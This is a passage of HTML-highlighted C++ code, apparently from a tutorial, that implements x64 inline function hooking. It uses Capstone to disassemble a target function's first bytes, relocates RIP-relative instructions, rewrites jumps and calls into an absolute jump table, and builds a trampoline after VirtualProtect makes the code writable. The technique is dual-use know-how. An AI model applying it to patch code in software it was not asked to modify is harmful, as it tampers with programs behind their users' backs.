<span class="kt">uint8_t</span> <span class="n">absJumpInstructions</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0x49</span><span class="p">,</span> <span class="mh">0xBA</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0xFF</span><span class="p">,</span> <span class="mh">0xE2</span> <span class="p">};</span>
<span class="kt">uint64_t</span> <span class="n">addrToJumpTo64</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">addrToJumpTo</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">absJumpInstructions</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&</span><span class="n">addrToJumpTo64</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">addrToJumpTo64</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">absJumpMemory</span><span class="p">,</span> <span class="n">absJumpInstructions</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">absJumpInstructions</span><span class="p">));</span>
<span class="p">}</span>
<span class="k">struct</span> <span class="nc">X64Instructions</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">*</span> <span class="n">instructions</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">numInstructions</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">numBytes</span><span class="p">;</span>
<span class="p">};</span>
<span class="n">X64Instructions</span> <span class="nf">StealBytes</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">function</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">// Disassemble stolen bytes</span>
<span class="n">csh</span> <span class="n">handle</span><span class="p">;</span>
<span class="n">cs_open</span><span class="p">(</span><span class="n">CS_ARCH_X86</span><span class="p">,</span> <span class="n">CS_MODE_64</span><span class="p">,</span> <span class="o">&</span><span class="n">handle</span><span class="p">);</span>
<span class="n">cs_option</span><span class="p">(</span><span class="n">handle</span><span class="p">,</span> <span class="n">CS_OPT_DETAIL</span><span class="p">,</span> <span class="n">CS_OPT_ON</span><span class="p">);</span> <span class="c1">// we need details enabled for relocating RIP relative instrs</span>
<span class="kt">size_t</span> <span class="n">count</span><span class="p">;</span>
<span class="n">cs_insn</span><span class="o">*</span> <span class="n">disassembledInstructions</span><span class="p">;</span> <span class="c1">//allocated by cs_disasm, needs to be manually freed later</span>
<span class="n">count</span> <span class="o">=</span> <span class="n">cs_disasm</span><span class="p">(</span><span class="n">handle</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">function</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">function</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="o">&</span><span class="n">disassembledInstructions</span><span class="p">);</span>
<span class="c1">//get the instructions covered by the first 5 bytes of the original function</span>
<span class="kt">uint32_t</span> <span class="n">byteCount</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">stolenInstrCount</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">count</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span> <span class="o">=</span> <span class="n">disassembledInstructions</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="n">byteCount</span> <span class="o">+=</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">;</span>
<span class="n">stolenInstrCount</span><span class="o">++</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">byteCount</span> <span class="o">>=</span> <span class="mi">5</span><span class="p">)</span> <span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//replace instructions in target func with NOPs</span>
<span class="n">memset</span><span class="p">(</span><span class="n">function</span><span class="p">,</span> <span class="mh">0x90</span><span class="p">,</span> <span class="n">byteCount</span><span class="p">);</span>
<span class="n">cs_close</span><span class="p">(</span><span class="o">&</span><span class="n">handle</span><span class="p">);</span>
<span class="k">return</span> <span class="p">{</span> <span class="n">disassembledInstructions</span><span class="p">,</span> <span class="n">stolenInstrCount</span><span class="p">,</span> <span class="n">byteCount</span> <span class="p">};</span>
<span class="p">}</span>
<span class="kt">bool</span> <span class="nf">IsRelativeJump</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">bool</span> <span class="n">isAnyJumpInstruction</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">>=</span> <span class="n">X86_INS_JAE</span> <span class="o">&&</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o"><=</span> <span class="n">X86_INS_JS</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">isJmp</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">==</span> <span class="n">X86_INS_JMP</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">startsWithEBorE9</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0xEB</span> <span class="o">||</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0xE9</span><span class="p">;</span>
<span class="k">return</span> <span class="n">isJmp</span> <span class="o">?</span> <span class="n">startsWithEBorE9</span> <span class="o">:</span> <span class="n">isAnyJumpInstruction</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">bool</span> <span class="nf">IsRelativeCall</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">bool</span> <span class="n">isCall</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">==</span> <span class="n">X86_INS_CALL</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">startsWithE8</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0xE8</span><span class="p">;</span>
<span class="k">return</span> <span class="n">isCall</span> <span class="o">&&</span> <span class="n">startsWithE8</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">RewriteJumpInstruction</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">instr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">instrPtr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableEntry</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">distToJumpTable</span> <span class="o">=</span> <span class="kt">uint8_t</span><span class="p">(</span><span class="n">absTableEntry</span> <span class="o">-</span> <span class="p">(</span><span class="n">instrPtr</span> <span class="o">+</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span><span class="p">));</span>
<span class="c1">//jmp instructions can have a 1 or 2 byte opcode, and need a 1-4 byte operand</span>
<span class="c1">//rewrite the operand for the jump to go to the jump table</span>
<span class="kt">uint8_t</span> <span class="n">instrByteSize</span> <span class="o">=</span> <span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0x0F</span> <span class="o">?</span> <span class="mi">2</span> <span class="o">:</span> <span class="mi">1</span><span class="p">;</span>
<span class="kt">uint8_t</span> <span class="n">operandSize</span> <span class="o">=</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span> <span class="o">-</span> <span class="n">instrByteSize</span><span class="p">;</span>
<span class="k">switch</span> <span class="p">(</span><span class="n">operandSize</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">case</span> <span class="mi">1</span><span class="p">:</span> <span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">instrByteSize</span><span class="p">]</span> <span class="o">=</span> <span class="n">distToJumpTable</span><span class="p">;</span> <span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">2</span><span class="p">:</span> <span class="p">{</span><span class="kt">uint16_t</span> <span class="n">dist16</span> <span class="o">=</span> <span class="n">distToJumpTable</span><span class="p">;</span> <span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">instrByteSize</span><span class="p">],</span> <span class="o">&</span><span class="n">dist16</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span> <span class="p">}</span> <span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">4</span><span class="p">:</span> <span class="p">{</span><span class="kt">uint32_t</span> <span class="n">dist32</span> <span class="o">=</span> <span class="n">distToJumpTable</span><span class="p">;</span> <span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">instrByteSize</span><span class="p">],</span> <span class="o">&</span><span class="n">dist32</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span> <span class="p">}</span> <span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">RewriteCallInstruction</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">instr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">instrPtr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableEntry</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">distToJumpTable</span> <span class="o">=</span> <span class="kt">uint8_t</span><span class="p">(</span><span class="n">absTableEntry</span> <span class="o">-</span> <span class="p">(</span><span class="n">instrPtr</span> <span class="o">+</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span><span class="p">));</span>
<span class="c1">//calls need to be rewritten as relative jumps to the abs table</span>
<span class="c1">//but we want to preserve the length of the instruction, so pad with NOPs</span>
<span class="kt">uint8_t</span> <span class="n">jmpBytes</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xEB</span><span class="p">,</span> <span class="n">distToJumpTable</span> <span class="p">};</span>
<span class="n">memset</span><span class="p">(</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">,</span> <span class="mh">0x90</span><span class="p">,</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">,</span> <span class="n">jmpBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">));</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">AddJmpToAbsTable</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">jmp</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableMem</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">targetAddrStr</span> <span class="o">=</span> <span class="n">jmp</span><span class="p">.</span><span class="n">op_str</span><span class="p">;</span> <span class="c1">//where the instruction intended to go</span>
<span class="kt">uint64_t</span> <span class="n">targetAddr</span> <span class="o">=</span> <span class="n">_strtoui64</span><span class="p">(</span><span class="n">targetAddrStr</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">absTableMem</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">targetAddr</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">13</span><span class="p">;</span> <span class="c1">//size of mov/jmp instrs for absolute jump</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">AddCallToAbsTable</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">call</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableMem</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">jumpBackToHookedFunc</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">targetAddrStr</span> <span class="o">=</span> <span class="n">call</span><span class="p">.</span><span class="n">op_str</span><span class="p">;</span> <span class="c1">//where the instruction intended to go</span>
<span class="kt">uint64_t</span> <span class="n">targetAddr</span> <span class="o">=</span> <span class="n">_strtoui64</span><span class="p">(</span><span class="n">targetAddrStr</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">dstMem</span> <span class="o">=</span> <span class="n">absTableMem</span><span class="p">;</span>
<span class="kt">uint8_t</span> <span class="n">callAsmBytes</span><span class="p">[]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x49</span><span class="p">,</span> <span class="mh">0xBA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="c1">//movabs 64 bit value into r10</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0xFF</span><span class="p">,</span> <span class="mh">0xD2</span><span class="p">,</span> <span class="c1">//call r10</span>
<span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">callAsmBytes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&</span><span class="n">targetAddr</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">dstMem</span><span class="p">,</span> <span class="o">&</span><span class="n">callAsmBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">callAsmBytes</span><span class="p">));</span>
<span class="n">dstMem</span> <span class="o">+=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">callAsmBytes</span><span class="p">);</span>
<span class="c1">//after the call, we need to add a second 2 byte jump, which will jump back to the </span>
<span class="c1">//final jump of the stolen bytes</span>
<span class="c1">//the jump is written at dstMem, and its operand is relative to the end of the jump itself</span>
<span class="kt">uint8_t</span> <span class="n">jmpBytes</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xEB</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="p">(</span><span class="n">jumpBackToHookedFunc</span> <span class="o">-</span> <span class="p">(</span><span class="n">dstMem</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">)))</span> <span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">dstMem</span><span class="p">,</span> <span class="n">jmpBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">));</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">callAsmBytes</span><span class="p">)</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">);</span> <span class="c1">//15</span>
<span class="p">}</span>
<span class="kt">bool</span> <span class="nf">IsRIPRelativeInstr</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_x86</span><span class="o">*</span> <span class="n">x86</span> <span class="o">=</span> <span class="o">&</span><span class="p">(</span><span class="n">inst</span><span class="p">.</span><span class="n">detail</span><span class="o">-></span><span class="n">x86</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">inst</span><span class="p">.</span><span class="n">detail</span><span class="o">-></span><span class="n">x86</span><span class="p">.</span><span class="n">op_count</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_x86_op</span><span class="o">*</span> <span class="n">op</span> <span class="o">=</span> <span class="o">&</span><span class="p">(</span><span class="n">x86</span><span class="o">-></span><span class="n">operands</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
<span class="c1">//mem type is rip relative, like lea rcx,[rip+0xbeef]</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span><span class="o">-></span><span class="n">type</span> <span class="o">==</span> <span class="n">X86_OP_MEM</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//if we're relative to rip</span>
<span class="k">return</span> <span class="n">op</span><span class="o">-></span><span class="n">mem</span><span class="p">.</span><span class="n">base</span> <span class="o">==</span> <span class="n">X86_REG_RIP</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">template</span><span class="o"><</span><span class="k">class</span> <span class="nc">T</span><span class="p">></span>
<span class="n">T</span> <span class="nf">GetDisplacement</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">inst</span><span class="p">,</span> <span class="kt">uint8_t</span> <span class="n">offset</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">T</span> <span class="n">disp</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">T</span><span class="p">));</span>
<span class="k">return</span> <span class="n">disp</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//rewrite instruction bytes so that any RIP-relative displacement operands</span>
<span class="c1">//make sense with wherever we're relocating to</span>
<span class="kt">void</span> <span class="nf">RelocateInstruction</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">inst</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">dstLocation</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_x86</span><span class="o">*</span> <span class="n">x86</span> <span class="o">=</span> <span class="o">&</span><span class="p">(</span><span class="n">inst</span><span class="o">-></span><span class="n">detail</span><span class="o">-></span><span class="n">x86</span><span class="p">);</span>
<span class="kt">uint8_t</span> <span class="n">offset</span> <span class="o">=</span> <span class="n">x86</span><span class="o">-></span><span class="n">encoding</span><span class="p">.</span><span class="n">disp_offset</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">displacement</span> <span class="o">=</span> <span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">x86</span><span class="o">-></span><span class="n">encoding</span><span class="p">.</span><span class="n">disp_offset</span><span class="p">];</span>
<span class="k">switch</span> <span class="p">(</span><span class="n">x86</span><span class="o">-></span><span class="n">encoding</span><span class="p">.</span><span class="n">disp_size</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">case</span> <span class="mi">1</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int8_t</span> <span class="n">disp</span> <span class="o">=</span> <span class="n">GetDisplacement</span><span class="o"><</span><span class="kt">uint8_t</span><span class="o">></span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">offset</span><span class="p">);</span>
<span class="n">disp</span> <span class="o">-=</span> <span class="kt">int8_t</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">dstLocation</span><span class="p">)</span> <span class="o">-</span> <span class="n">inst</span><span class="o">-></span><span class="n">address</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
<span class="p">}</span><span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">2</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int16_t</span> <span class="n">disp</span> <span class="o">=</span> <span class="n">GetDisplacement</span><span class="o"><</span><span class="kt">uint16_t</span><span class="o">></span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">offset</span><span class="p">);</span>
<span class="n">disp</span> <span class="o">-=</span> <span class="kt">int16_t</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">dstLocation</span><span class="p">)</span> <span class="o">-</span> <span class="n">inst</span><span class="o">-></span><span class="n">address</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span>
<span class="p">}</span><span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">4</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int32_t</span> <span class="n">disp</span> <span class="o">=</span> <span class="n">GetDisplacement</span><span class="o"><</span><span class="kt">int32_t</span><span class="o">></span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">offset</span><span class="p">);</span>
<span class="n">disp</span> <span class="o">-=</span> <span class="kt">int32_t</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">dstLocation</span><span class="p">)</span> <span class="o">-</span> <span class="n">inst</span><span class="o">-></span><span class="n">address</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="p">}</span><span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">BuildTrampoline</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">dstMemForTrampoline</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">X64Instructions</span> <span class="n">stolenInstrs</span> <span class="o">=</span> <span class="n">StealBytes</span><span class="p">(</span><span class="n">func2hook</span><span class="p">);</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">stolenByteMem</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">dstMemForTrampoline</span><span class="p">;</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">jumpBackMem</span> <span class="o">=</span> <span class="n">stolenByteMem</span> <span class="o">+</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">numBytes</span><span class="p">;</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableMem</span> <span class="o">=</span> <span class="n">jumpBackMem</span> <span class="o">+</span> <span class="mi">13</span><span class="p">;</span> <span class="c1">//13 is the size of a 64 bit mov/jmp instruction pair</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">numInstructions</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span> <span class="o">=</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">instructions</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">>=</span> <span class="n">X86_INS_LOOP</span> <span class="o">&&</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o"><=</span> <span class="n">X86_INS_LOOPNE</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">//bail out on loop instructions, I don't have a good way of handling them </span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">IsRIPRelativeInstr</span><span class="p">(</span><span class="n">inst</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">RelocateInstruction</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="p">,</span> <span class="n">stolenByteMem</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">IsRelativeJump</span><span class="p">(</span><span class="n">inst</span><span class="p">))</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">aitSize</span> <span class="o">=</span> <span class="n">AddJmpToAbsTable</span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">);</span>
<span class="n">RewriteJumpInstruction</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="p">,</span> <span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">);</span>
<span class="n">absTableMem</span> <span class="o">+=</span> <span class="n">aitSize</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">==</span> <span class="n">X86_INS_CALL</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">aitSize</span> <span class="o">=</span> <span class="n">AddCallToAbsTable</span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">,</span> <span class="n">jumpBackMem</span><span class="p">);</span>
<span class="n">RewriteCallInstruction</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="p">,</span> <span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">);</span>
<span class="n">absTableMem</span> <span class="o">+=</span> <span class="n">aitSize</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">);</span>
<span class="n">stolenByteMem</span> <span class="o">+=</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">jumpBackMem</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="mi">5</span><span class="p">);</span>
<span class="n">free</span><span class="p">(</span><span class="n">stolenInstrs</span><span class="p">.</span><span class="n">instructions</span><span class="p">);</span>
<span class="k">return</span> <span class="kt">uint32_t</span><span class="p">(</span><span class="n">absTableMem</span> <span class="o">-</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">dstMemForTrampoline</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">InstallHook</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">payloadFunc</span><span class="p">,</span> <span class="kt">void</span><span class="o">**</span> <span class="n">trampolinePtr</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">DWORD</span> <span class="n">oldProtect</span><span class="p">;</span>
<span class="n">VirtualProtect</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="mi">1024</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">,</span> <span class="o">&</span><span class="n">oldProtect</span><span class="p">);</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">hookMemory</span> <span class="o">=</span> <span class="n">AllocatePageNearAddress</span><span class="p">(</span><span class="n">func2hook</span><span class="p">);</span>
<span class="kt">uint32_t</span> <span class="n">trampolineSize</span> <span class="o">=</span> <span class="n">BuildTrampoline</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">hookMemory</span><span class="p">);</span>
<span class="o">*</span><span class="n">trampolinePtr</span> <span class="o">=</span> <span class="n">hookMemory</span><span class="p">;</span>
<span class="c1">//create the relay function</span>
